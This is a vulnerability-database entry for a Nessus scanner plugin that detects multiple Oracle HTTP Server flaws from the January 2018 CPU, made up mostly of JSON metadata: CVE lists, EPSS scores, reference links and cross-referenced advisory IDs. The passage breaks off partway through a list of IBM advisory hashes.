Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities (January 2018 CPU)

2018-01-24T00:00:00

Description

The version of Oracle HTTP Server installed on the remote host is affected by multiple vulnerabilities as noted in the January 2018 CPU advisory.

{"id": "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities (January 2018 CPU)", "description": "The version of Oracle HTTP Server installed on the remote host is affected by multiple vulnerabilities as noted in the January 2018 CPU advisory.", "published": "2018-01-24T00:00:00", "modified": "2023-04-25T00:00:00", "epss": [{"cve": "CVE-2015-7501", "epss": 0.01023, "percentile": 0.82043, "modified": "2023-12-06"}, {"cve": "CVE-2015-7940", "epss": 0.00246, "percentile": 0.62368, "modified": "2023-12-06"}, {"cve": "CVE-2016-0635", "epss": 0.00286, "percentile": 0.65283, "modified": "2023-12-06"}, {"cve": "CVE-2016-1182", "epss": 0.35201, "percentile": 0.96705, "modified": "2023-12-06"}, {"cve": "CVE-2016-2107", "epss": 0.97321, "percentile": 0.99857, "modified": "2023-12-06"}, {"cve": "CVE-2016-2179", "epss": 0.28466, "percentile": 0.9638, "modified": "2023-12-06"}, {"cve": "CVE-2017-10068", "epss": 0.00142, "percentile": 0.4965, "modified": "2023-12-06"}, {"cve": "CVE-2017-10262", "epss": 0.00152, "percentile": 0.51189, "modified": "2023-12-06"}, {"cve": "CVE-2017-10273", "epss": 0.00069, "percentile": 0.28611, "modified": "2023-12-06"}, {"cve": "CVE-2017-10352", "epss": 0.00093, "percentile": 0.38997, "modified": "2023-12-06"}, {"cve": "CVE-2017-12617", "epss": 0.9747, "percentile": 0.9996, "modified": "2023-12-06"}, {"cve": "CVE-2017-3732", "epss": 0.0051, "percentile": 0.73892, "modified": "2023-12-06"}, {"cve": "CVE-2017-5461", "epss": 0.01326, "percentile": 0.8445, "modified": "2023-12-06"}, {"cve": "CVE-2017-5645", "epss": 0.81948, "percentile": 0.98076, "modified": "2023-12-06"}, {"cve": "CVE-2017-9798", "epss": 0.97355, "percentile": 0.99877, "modified": "2023-12-06"}, {"cve": "CVE-2018-2561", "epss": 0.00138, "percentile": 0.49056, "modified": "2023-12-06"}, {"cve": "CVE-2018-2564", "epss": 0.00212, "percentile": 0.58984, "modified": "2023-12-06"}, {"cve": "CVE-2018-2584", "epss": 0.00074, "percentile": 0.30669, "modified": "2023-12-06"}, {"cve": "CVE-2018-2596", "epss": 0.00212, "percentile": 0.58984, "modified": "2023-12-06"}, {"cve": "CVE-2018-2601", "epss": 0.00099, "percentile": 0.40539, "modified": "2023-12-06"}, {"cve": "CVE-2018-2625", "epss": 0.00176, "percentile": 0.54617, "modified": "2023-12-06"}, {"cve": "CVE-2018-2711", "epss": 0.00142, "percentile": 0.4965, "modified": "2023-12-06"}, {"cve": "CVE-2018-2713", "epss": 0.00212, "percentile": 0.58984, "modified": "2023-12-06"}, {"cve": "CVE-2018-2715", "epss": 0.00086, "percentile": 0.35705, "modified": "2023-12-06"}, {"cve": "CVE-2018-2760", "epss": 0.00171, "percentile": 0.54042, "modified": "2023-12-06"}], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/106299", "reporter": "This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2711", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2179", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7501", "http://www.nessus.org/u?6072c657", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10273", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0635", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2596", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2584", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2715", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10262", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9798", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5461", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2564", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5645", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2625", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2760", "http://www.nessus.org/u?76507bf8", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2713", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1182", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7940", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3732", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10068", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2601"], "cvelist": ["CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-1182", "CVE-2016-2107", "CVE-2016-2179", "CVE-2017-10068", "CVE-2017-10262", "CVE-2017-10273", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-3732", "CVE-2017-5461", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2561", "CVE-2018-2564", "CVE-2018-2584", "CVE-2018-2596", "CVE-2018-2601", "CVE-2018-2625", "CVE-2018-2711", "CVE-2018-2713", "CVE-2018-2715", "CVE-2018-2760"], "immutableFields": [], "lastseen": "2023-12-07T16:33:59", "viewCount": 605, "enchantments": {"dependencies": {"references": [{"type": "aix", "idList": ["OPENSSL_ADVISORY21.ASC"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2016-2107", "ALPINE:CVE-2016-2179", "ALPINE:CVE-2017-3732", "ALPINE:CVE-2017-3738", "ALPINE:CVE-2017-5461", "ALPINE:CVE-2017-9798"]}, {"type": "altlinux", "idList": ["0653EF8FF93081FDAAAD6A62AD8FC143", "0F5716A274F3E1DB2EDBD5A58776897C", "1DBF0138EA0271447B15B3FF6BEC88C2", "29A30227C72BEB879513AC9D0E0557BF", "2B4F5942EE693DA2DABCA1AEEF4B9716", "2F5BB4D4D211E1FB288B8D2224919136", "3C9931BBB629F08341BED24F1E7EF91D", "419E7F5709487659FE2C94F5A6F4DD82", "523602ADA32D534426305986C8D7BA00", "6E8B796A6FEE95047EFD1F1579BB3755", "849C94248A52E0A8AA02CC14B5BE89EA", "9D1BFD1F5DED4F791BE8B063FE579BF5", "A075EE4F94FB22A5FFB0548A74632DD9", "A0E54B696384B2DA588257BEDC733600", "BBD5403B3B956EA3EFD6543AEFF2E749", "BF0DDC573F2D5A313E6E07E02BC91B47", "CA02D996C51FDE4696ED5DEAE9A556FD", "D037F1D5A73BA6F6D6E3391F1C50B295", "D9F68116E5F92212DE7F9C8E8C1305BF", "F4983E5BD264C7DCE81454497ACB4A75"]}, {"type": "amazon", "idList": ["ALAS-2015-618", "ALAS-2016-695", "ALAS-2016-755", "ALAS-2017-825", "ALAS-2017-896", "ALAS-2017-913", "ALAS-2018-1016", "ALAS-2022-1562", "ALAS2-2018-1004", "ALAS2-2022-1739"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-07-01"]}, {"type": "apple", "idList": ["APPLE:08DDC9EE4E7DEBCD387FA33304B8E244", "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:HT206903", "APPLE:HT208331"]}, {"type": "archlinux", "idList": ["ASA-201605-3", "ASA-201605-4", "ASA-201609-23", "ASA-201609-24", "ASA-201701-36", "ASA-201701-37", "ASA-201704-4", "ASA-201704-6", "ASA-201705-21", "ASA-201709-15"]}, {"type": "arista", "idList": ["ARISTA:0020"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-64394", "ATLASSIAN:JRASERVER-65102", "ATLASSIAN:JRASERVER-70686", "JRASERVER-64394", "JRASERVER-65102", "JRASERVER-70686"]}, {"type": "attackerkb", "idList": ["AKB:38474044-13DA-4165-A8D4-86867CA68D83", "AKB:CC9CD3C9-B8CC-456B-9B8A-33A1EB9498E9", "AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC", "AKB:FB2F65B2-D10B-4622-AEE6-41AAD3C1E6E7"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"]}, {"type": "canvas", "idList": ["JBOSS6_JMXINVOKERSERVLET_DESERIALIZE", "WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "centos", "idList": ["CESA-2015:2521", "CESA-2015:2522", "CESA-2015:2671", "CESA-2016:0722", "CESA-2016:0996", "CESA-2016:1940", "CESA-2017:1100", "CESA-2017:2423", "CESA-2017:2882", "CESA-2017:2972", "CESA-2017:3080", "CESA-2017:3081"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-1313", "CPAI-2016-0349", "CPAI-2017-0774", "CPAI-2017-0779", "CPAI-2017-0827", "CPAI-2017-0896", "CPAI-2017-1082", "CPAI-2017-1216"]}, {"type": "cisa", "idList": ["CISA:6A3DB540F84D34B9BB99751624D91DB9"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-12617"]}, {"type": "cisco", "idList": ["CISCO-SA-20160504-OPENSSL", "CISCO-SA-20160927-OPENSSL", "CISCO-SA-20170130-OPENSSL"]}, {"type": "citrix", "idList": ["CTX212736", "CTX233832"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:387B2BBB51760E1FFD4562D4008446F7", "CFOUNDRY:927660022E9A31CE680A6AE3AFF33997", "CFOUNDRY:F006390335E44CFEC69607A8E9BE3B62"]}, {"type": "cve", "idList": ["CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-1182", "CVE-2016-2107", "CVE-2016-2179", "CVE-2017-10068", "CVE-2017-10262", "CVE-2017-10273", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-3732", "CVE-2017-3738", "CVE-2017-5461", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2561", "CVE-2018-2564", "CVE-2018-2584", "CVE-2018-2596", "CVE-2018-2601", "CVE-2018-2625", "CVE-2018-2711", "CVE-2018-2713", "CVE-2018-2715", "CVE-2018-2760"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1102-1:511F7", "DEBIAN:DLA-1102-1:7F277", "DEBIAN:DLA-1166-1:E77EB", "DEBIAN:DLA-361-1:E2323", "DEBIAN:DLA-456-1:BB65D", "DEBIAN:DLA-637-1:F8314", "DEBIAN:DLA-906-1:3F80D", "DEBIAN:DLA-906-1:D16E9", "DEBIAN:DLA-946-1:9FF89", "DEBIAN:DSA-3417-1:682B4", "DEBIAN:DSA-3417-1:D5725", "DEBIAN:DSA-3566-1:D74F5", "DEBIAN:DSA-3673-1:477A4", "DEBIAN:DSA-3831-1:EE460", "DEBIAN:DSA-3872-1:C19C1", "DEBIAN:DSA-3980-1:6FBEB", "DEBIAN:DSA-3980-1:C7ED3"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-7501", "DEBIANCVE:CVE-2015-7940", "DEBIANCVE:CVE-2016-2107", "DEBIANCVE:CVE-2016-2179", "DEBIANCVE:CVE-2017-12617", "DEBIANCVE:CVE-2017-3732", "DEBIANCVE:CVE-2017-3738", "DEBIANCVE:CVE-2017-5461", "DEBIANCVE:CVE-2017-5645", "DEBIANCVE:CVE-2017-9798"]}, {"type": "dsquare", "idList": ["E-627"]}, {"type": "exploitdb", "idList": ["EDB-ID:42745", "EDB-ID:42953", "EDB-ID:42966", "EDB-ID:43008", "EDB-ID:43848"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:28422BD346C315BD9B02E4A18C1B9B0A", "EXPLOITPACK:31B3E3F4C5EABC55DF384007CB11320A", "EXPLOITPACK:65B3837C7995B55CBE45A13A505B8C67", "EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D"]}, {"type": "f5", "idList": ["F5:K04403302", "F5:K04734219", "F5:K07538415", "F5:K10105323", "F5:K12109859", "F5:K23173103", "F5:K23512141", "F5:K34681653", "F5:K44512851", "F5:K53173544", "F5:K70084351", "F5:K93600123", "SOL04403302", "SOL07538415", "SOL22071504", "SOL23512141", "SOL93600123"]}, {"type": "fedora", "idList": ["FEDORA:092E9605F081", "FEDORA:0AC1C60C76B5", "FEDORA:341EA6057129", "FEDORA:376506075014", "FEDORA:44719604F0C3", "FEDORA:4B961604A720", "FEDORA:4EA2C604D2D3", "FEDORA:56D376268FDB", "FEDORA:58BAF60A0C7C", "FEDORA:63AEC601CFBA", "FEDORA:6D641613A08A", "FEDORA:6DCC66067328", "FEDORA:76CFD605E21F", "FEDORA:7E8A66075F16", "FEDORA:8830E6049DEB", "FEDORA:97D036078C28", "FEDORA:A3C8D604C8B1", "FEDORA:A7FE360648D0", "FEDORA:A9847604E850", "FEDORA:A99066078F69", "FEDORA:AB2DD6067A04", "FEDORA:D917260C7478", "FEDORA:DB25A6083B5B", "FEDORA:E150A6395ADF", "FEDORA:EFDAB6050C3B"]}, {"type": "fortinet", "idList": ["FG-IR-16-026", "FG-IR-16-048", "FG-IR-17-019", "FG-IR-17-251"]}, {"type": "freebsd", "idList": ["01D729CA-1143-11E6-B55E-B499BAEBFEAF", "43EAA656-80BC-11E6-BF52-B499BAEBFEAF", "4CB165F0-6E48-423E-8147-92255D35C0F7", "5E0A038A-CA30-416D-A2F5-38CBF5E7DF33", "76B085E2-9D33-11E7-9260-000C292EE6B8", "C0DAE634-4820-4505-850D-B1C975D0F67D", "D455708A-E3D3-11E6-9940-B499BAEBFEAF"]}, {"type": "freebsd_advisory", "idList": ["FREEBSD_ADVISORY:FREEBSD-SA-16:17.OPENSSL", "FREEBSD_ADVISORY:FREEBSD-SA-16:26.OPENSSL", "FREEBSD_ADVISORY:FREEBSD-SA-17:02.OPENSSL"]}, {"type": "gentoo", "idList": ["GLSA-201612-16", "GLSA-201702-07", "GLSA-201705-04", "GLSA-201710-32", "GLSA-201802-03", "GLSA-201802-04"]}, {"type": "github", "idList": ["GHSA-4MV7-CQ75-3QJM", "GHSA-5GGR-MPGW-3MGX", "GHSA-FJQ5-5J5F-MVXH", "GHSA-FXPH-Q3J8-MV87", "GHSA-XJGH-84HX-56C5"]}, {"type": "githubexploit", "idList": ["C2D99D6A-1A8C-5D55-BBB7-34A978AAC642"]}, {"type": "hackerone", "idList": ["H1:136986", "H1:194761", "H1:197253", "H1:269568", "H1:634630"]}, {"type": "httpd", "idList": ["HTTPD:6236A32987BAE49DFBF020477B1278DD", "HTTPD:7DDAAFDB1FD8B2E7FD36ADABA5DB6DAA"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20160706-01-OPENSSL", "HUAWEI-SA-20170322-01-OPENSSL", "HUAWEI-SA-20170503-01-OPENSSL"]}, {"type": "ibm", "idList": ["00420FAFAA8875EA075916FF1CAC2CE1CD7DEB3C678E654BFE5E525386DC980C", "0236273B86DA07DEDD01575B8D7BC09BC4245E7465F644F4852F3C74F78F2689", "025E2CD6F9F010517E9E17E8AC66A53012D7F2D3765B567272ACF4ED02426647", "03180DAB39E0A4D2F6A125A173EDF5A9BB41D6EC602F0BC77B45013371762493", "068E4774F9835C8E080EE324144DDF1D362B4CFF31E92E6F3B859DDEBD2C9E8C", "06DE81C34BCC037C425D4880FEE00C839756BAEBF07AE79D786A78C384E9210B", "06FAF3AD79C8BAC8455C602C3F4C354C0CD9450DE060FB4D831ED000993782B4", "072EBEFE4EF574F4A87AC95BEA1237C43CF6D39DDD94C6BD9B965A322BB8CD15", "0942FB184F4FAEA2A4874C81B33060A84D8FF049E6F0B9FC6D173CD5FE1FF9A9", "0A94A36BE877692B2F0AB97F5081AA5C3010CDF94C05C7E8B0C0AC4E64BEBA67", "0AEC3ABCCFB562437ED4141670F5C7C6E096FEFB11D3045A28046C82B784AD9E", "0BF273789D1B41FCA359A93988125066B51B0DC825C21E4488D80FB61F79560E", "0C0756C600D4B428F9DDC7547681FF909EA01654FA2BE7931EB24F307960FE26", "0CAD9B5F1A6613661D52E522A6B15A04801FB7B31F20DEE4D7CA8F62526D5982", "0CF13F8FB4FD77C6593C265FA8F397D0C4324FC1F07F86C436B4937E98B25DBF", "0DA16010754F6A3A66E6070FF741D701A7AD021EAE93340A6584612005BFDA0C", "0DCB9190AD49CA4A44EED134393F472D4D903648111D70599B707F22E81A5F5B", "0E703A42B01F9DF3E0FEC04EEA4F7733F5A313C86865501C0F8A79378E425C34", "0EB149242AF86C92359FD2819FE5CA2FA94AAA9A6E3A7381956968DD540CEF70", "0EE17D440C828A2F1F3F9C3FDE6036B28E45371AB043D8D00888155801644813", "0F4490A26A7A5960275AF6437143D350A19CD931C617E64E2575EA3E557FDA61", "0F73246124CA58D05064BB5D07082DCA6F2A1D48630CAAC82BCFFB4A71F45CA7", "104BE807C8577FF816DF414B5A588FABB581711BB54758F6F49C7CAC17CD68BE", "107B029DD56A2199A3A87E51461350D452A0422C3E3D25CE9E1B91F71C36131B", "11452E38010E945A0FE01EFC4554F3798D8F99A1582985B386C674085821DFEE", "1148C8DD30AC2930E528C1791D370C73ECDA7CF974AD249EBD19AD99B78AAD68", "12160D8B9DA998BD9B96E21D163BC830E6C209BFFCC664A483A9178521D4B6C0", "12780044E1A62D25F913723FBCBD5B926E91CC9AC8CA8FAA1DCE18D02D152689", "12C657CCB040A2D71F5E7B37692A10A6A4BAA07FBFEAADA8E6F9A5BCFCFD9FAB", "1381DDC2EB11D20FD35FD5133E3BDD2833703D883F98CAA012F0CFBF823F4A6D", "142CC78D456D60E4C1854BC0E93F8802FF4122A7CF6BFD85E457671E02B96A45", "1474F163099BD1C4DB8F70895B954933F28B5580B4DBEFB505E0602EC2A9A7A3", "1736B585D80ED031E004E1AC38E590615C7E0F6FE6AB8A15B1B90CB8EC998277", "1807EADF7EBF2384517F3DB77ADDC9D63E9DD27A36B822C92526AF1341782404", "1815BD265DEB0EE550962E1526DA1FE75BACA3823A20A4BCDA8ED078F9EC9C8D", "1A977E1D46AE4CB4B7068DB341125931FAD75C28D6703503973FFF9BE917887F", "1AE1A5453DE71F54F721615E0361AC5AFC9F69B537244D4EE71AADDF1666ED92", "1B2DCE61952BC751A0A03EA7E17596B9EB37FF0F00BB308BB9D09896E591D7E1", "1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "1C3B18793ACB5388E3C647E0D111B2CBA7FB3EDD55E25DF15A8B98FC47CA05B3", "1C7571B870C8E0F53BD1021F740C140F42C5E17DC0CF9E67A9EA518C91C58FE9", "1D18DE555FB91F29F8BBC3532E15A21A7A5DE61EF8C2DB29C73E6BDCF4F0E604", "1D6C51DC7D1DD9D1A9F07B9737CE12B7F8F933D3089EBCB68A0BBCF75680D250", "1E5AE139B10CF500092EA776D2FBEC36F6F4E6FA4F54A5E7D26647544F0BCEDC", "1E645674D777924BC329B3C0A175ED89181CFB788B28FF3FF2391773A332B20F", "20D9B1C2D3F737956AC381DAF6FF3FD0DC2DEDE18274DB6C07B12D75ED1546A2", "21781046737819F9BECB0172803EAC75FA331A489C94879B0B9D69C572F33FCF", "219D23DAB6D7EED6140DB01019ADA2A19ECEF81B9513870787828621344C3705", "233226C0332001C81596C237819F64BB35F4B49297346F216B4DC90C72D26485", "23F8C1E67922626C0589CA86ED9B40D441D494E8B56CD8FF4A2EF76F18E6861F", "24B1AE073C3E8B032429754E1E35B7D96539587DDA275F7A13183F44D07B88D2", "2614071BF8D5B0482694D82BE1651280FCE95089D3BF507FE1CD1ED3591D2446", "2747E3830DAF51B2780DB9863A2F1C153F8615DBA44A0B3E6AC2214663DF92F9", "286378C830B748E29DFAEAB7AC19693EE4565D1CAB6189EAA20A975B835DFAD6", "29036B6FEB00571E2FBC00E867150134E5DF9C08AD44F9670B7C8B0109F99570", "291CDEB3B052F83F4CD9EEB51160C0A1976EEA944AD2E7630096F4DA64D82A76", "2BB93AE1C7A3B73A6491F3A66D7F39AEF96849CFFB0026B650053C816A375F8C", "2C4C30F6AC204024BBD3AF2432B026E0ED887823187122603D99EB1B737069A7", "2C50142AFAF98D1A6DAAE0DCF60AF9902BA861EACEB35AD2405F8E31A1B54456", "2CA5D41818E752F28081A75E5ED108A18F92F75F767B3E9B6E8AB54215538972", "2DD38E427DB50FDA5C4D07F52BDC62BA35206BA44BC185595E39ACAE88DD41C5", "2E9BC1AFBA9F34E20E313BA5B8B5B6C1AEEC0E8F6EC0B353125AA17460789A62", "2EAC4450763B71AF0083E418641A92A7E2E6BBCFE232EABDB6D4A9B98BDB7EEA", "2EB8A3A34F13FAA08E22E3997DB0F3D1575349656D6F141EC72ED1BF89C93546", "2F4353DF684AD6726CB9491220A703D4AD06D4406D7B35BEBCB2D4EE11863E10", "3048CBA7FDCF53E63595104F24F428E3014DB1EE5B3AE7E450E0E0C06E5736BB", "308A05F5B1028A741D58EC30AC13C7A0A2B660380B87E8811177772F0014DA1B", "30A4A01C549DEF2D2904EB78D4A353DFFF92C9FCE120003D2C0723EC51C85B2A", "30F31D61B76815116E40D478A4FF3D7F4375DE5C3DE9AF0D9789BB84723A1B12", "3165A2AA157F1B9BD1D78DE6275BFF661B98BF29C82399B7216463D7581B8060", "328EA4EC6B75924B9BAF1379828755E57421F5DD51277D579C2833A7289B6F85", "32C5F3A427C23B34350EBCA676883F18871AA834AA2E92920588454B1810F4E9", "33E618FFA988ABAF1F8980465E0C050DDAE38F327AE61E58375E39344D009142", "340A46633C57BC64A513C7574F7A78D6AB2EB22FC581AFEB2E64A95AF1A94932", "35774A12657731256610BEB1ACB2AE99C105060354AA560F82DED28AE65A8B24", "35F9A813F05B327D07BF7368CED622D5E23B4D9BCBE752850A037D89EB6C0A00", "362D62C684CC4EC1C14D4239144C432AC6F62E6231DC7416F6DEB9B4ED0F1853", "366FA55EE0B09B40AABB041DB433F5E49FC0E42F7988440387EBE3EED9DBAE91", "374411ADB66A6B6C60B3EE4DE9977ADF2AE7482BB4DDC9927957858BCCD39B02", "381B76F53A26572A7C476380F44421473D669346B3F00F995B318188F2D2B793", "399718E68B1AC921F1F63310793CB30CE98BCB15C409BBB99985FB5BE97A027F", "39CAE5EE9A0F3DE219E28E6A3BE90E3B8E089FF2AA4C74E8BE3A4E2714716AC5", "39D4A3024CD82E0AB1412C8F0B7DE6C9C896CC59E99FBAB7A5A61175586A3211", "3C34CA137D675C01FA30FF52E4840DE4F8835BDD73CFE7BE14C18869DE46A7B2", "3C630E87CC8A98E980FC5838CF94096C676B99FA65014F79A0F1057053EEB9E0", "3CFF13ADA1D4912594BB3AC9D0D9ACB17881A208B1AD8998A1E8BD64DD6C5268", "3D12006C995C2C683E173419369377B400C7252133E8CFEEEC83E09104078893", "3D737E91C4B3785D05EA6B518DF81A98A3D897F7446C9E2969F3A9E22A7F3BF4", "3D8540513E9389E52505EF4CCF99C1FC5DC8928BFA49128170D48087D1264725", "3DAB255772B5C0465CD2A50FC27BF93D482025FE8D7247F3C147E19AC9F9AFD2", "3DF4EFFCBD4398CD9D2C6995C59DEC9020B7665B1A75D2B23F0CFA94C34BBB8A", "3E3AF8AC7BA63076BEE8FFB670B3A3F27E0903C83526E54496E50EB2DF74B875", "3E4520A9DDDBF10F6B94F393C5ACDA44738184D5CB46AB64AABDC963283BECFE", "3F02DA1DC04A6C658BCF965E5FB3FFCC64EB1D7D66FB0A8038636EF62D559250", "3F69F1D0D10816FD8495E0C83E350D2B9E6780C77327A103789FDAA73BA20599", "3F80F1C5995CB0E287AB72B1E8BF8C924AB58095FF03363465C1CD78E76837BF", "3F87B04299510DB46305863338E9A0F1914960F422CD52BBCEFC7A8547CEF17D", "4045CCD240F2B35A8601219CE94DB09C4D73D63425EC22F9B94DF9CFAD2D1890", "411DE209066A00259E38D292C22264C2EDA3B961B523920D589433F42FB534BC", "4250B3DD6EE0328D9C74AEF40742DE820FA06152EBCCE27DF8DD34DE016AB4B9", "4278728D85C79F2084FC36711DAAF10C86E475C8E6940F2111DD155F1C48C0FA", "4337F9AE4A5A2285A37D88E12A5DAC941D106D987FD93F7005C756BEB07720F5", "43D6A9E05A4CC6A06B189CA54AC124E51768DDF9C5BF0CCD807BBC3420EEFF39", "43D6C2F69BACC643553BCB8943CE09506B5D513BE314B3093934E9025893C9BF", "43F04716E6B0E2BF698B22EF7A50C437F4D7B8FF87A1F35A7A342FA2BFEC87F6", "440F021094DE35C6A13F9FADEA7C56D6B4093B16EFDEAEC496EC398C5AC7A327", "449F34AAD10DD9765AEBD2663CC16B31AA5D35B533E921970DCB2DD9DF361C47", "462CCAEFE39DE4B8C89C00328CBC9CA234F0066E30424E0C8AE6BA1EF9AA8903", "46799FCDE18E3EFD375868A79B70BC4BEDEC133C2495D8AA8CF81D91E7DEF01A", "46D4B9F92B3C18E29E5C7BBEC13D92B5ECA31B1A6E3BE57749375938FC2B3CBC", "470FB53E20DCF01D3FF4FB7251C5868A5D215FF7480131C88B1F5C06E159D01A", "4904478758E68B5AAF1019EF051EFDC11A110285B2C9609A3BF862A4F48B7806", "4B148567EC90382B0050CCDE54A9B83A43198C92EC9BE9CFC73EDF1EA73C84B9", "4B97D587ED0EB00F691EC8B1DEAE11012A90D1363A87AB9E90AA9B29B0236141", "4C38766283CEE338D5C512A76FE766520F818C766B10B8F6096918C93D2A8A67", "4C3B655997B1B90D55D74A5668CC31D928F2F462E891BF5BEB27CAD7295489D4", "4C800D760232A012AE25AED7F8AFCFF9E3EF3D9D48D3614E764CC6588F221519", "4C98F5463E3FBB67682E7F864F699DD4A99514832D6E44999F6672401F35C8B0", "4DCD65078718A8D516F2EEE878B45FE5D131D6C4D4010E935F3E6A750A6D9BB3", "4E95B5EB959CBE5490B90287812FD445A690A3158E83D37882EADCE4A7BCD44F", "4FD47AEA2F5CB5889B57E92B9DC421BD8EAFD564DE765D5E28E9C751B5921C33", "50C63CAB6CE7C82879629075DBEC583B457D2B0B2841FC0D9A8D67A25B64EB25", "50D29823D1F18CC1FB9A002BD0994315DDFA79FE8E446748A193B22689C93A82", "52978310171C7824FCB3D7F95C69EBF1D6E27BF67B6F66BA0F589002F4898E20", "52A5398094130E1B0A40291225AFDAF806D3B8B80AD7F16F186739DA6E836335", "55525A5AB54D0FA4DF8FA8BD6DC8E03E586A11FBFBE9E5EA61E7B15171D0178E", "55C6EB16408836E84C4255320770BC4F60934779CE325008D25B4951C20115C1", "55DACA18AFE52B9657ED6763ECD6310E15A2B6AF470F5EA9C7BA6E971FD15B5B", "5641564DE1A4B9249AC0EED2F265EE204961C428F093EC99321D93DA0AA23C3E", "5711509DD871227FC9F7CD530DA0E06F21DDA1D522E7B1C76AC95D3AD5F6BC07", "57A11B587849D0E11C412236D22F7BCF16F25A1EFBAC8A9A8B6F2723A64C8C41", "57CBD94F97013E208754F9AF764D3D11B1DD38D12A2436EA761D2BBFEB325C9A", "58C9C23A20C5D55610ECFF1953DA7C91CDE42118EE0F8DBDBF1D696C4A948D37", "591E98996DBAEC8DA2E30D3261AADF9BF750C358714362A5B9B9F30A1AC23AB8", "59AFB6B22B3D21FAFDC933DA29973F4C6887013B5320E839F5B0B140E8DDA7D1", "5A5125564C5E6100B8631DC69D64BB29F15CFE14C3E6A31A6DF6AD6E3808314A", "5A8825AD62C7A9668D229174BBF47E909FDDC63BC31C38BE196932E629C1F298", "5B0D973A3FED1AF2D6DC61C906D27DFB052F1D42B4263EA8695D5ECC3E5F9F09", "5B4C19B2CA9D2714AEF1546FC810D709406148AD04288568A5EFCF5FDEF9B2D5", "5B61A8C776F5DB5A9AF0C13607CB60BA8EAB34C3208154E6FCEAAD0857CCDCEA", "5D567CAC8B1B91B66CC85A1C9A61736F3CBA22497515DD3F0D18247FA0662627", "615E4369D0B07E7BA358AF447BD05A3ACC0720A255109ADB57E2A2080DB3607A", "62DB70FCF6301104005FF9FB20C71886DC177ADAE354920858B0940C223989CD", "637F608901EF8B9FD34455682320A8EBC1B665D4F6B5C7F53F3E57AE66C9AAAA", "6390A51C827FA9826D05D6F22A5DB62BFFC9752CF836C6B898D5F5BEA5C44130", "63DAB7532D89108F5D2DC3FDE381EF3F537B4BD859941C18E4BAD485F5223BE3", "65DC12D6E8E0D53E6ED0AF1F356647C749F500509AAE6E4435FC95F00517F01C", "6858032AD0022691AF88FEDCEF29BB4CEA50172EAD995CAB6463B91C16637C1C", "68620709627EAD066E865897A856617556047C7100878749E07A6C6B5831EB59", "68E7DB3D7E398B2706226213F9B1A94ACD374A065EE9538BCE2CF140B065CB08", "691466DAEE06683E49687F1AD61B1DE274EE44CA9F6E86B9BF8D7D76D6346999", "699A1ED7C203BD1C8BA3FC9BCD0A95A9618D0B3B3F0BC3CD80DE6C86C31C5E44", "6A2E92D36FABC1D54E354DFAE40C5959271B5DD0561E7165A41D0F6CCD6A7B7C", "6AB5B24B612744A794E7F28CC88F04C811F4BB9710FE31917EFCB65EDDDF7C9A", "6CDA9CBBD4E668C70A53BD4F7D7CDE00CF73C49E1D8C5300C858682BFBB02BCB", "6D1266D7512253D04698EC2DEB85B8BF906B1F2E64F7EABD217D462B19E8EBEC", 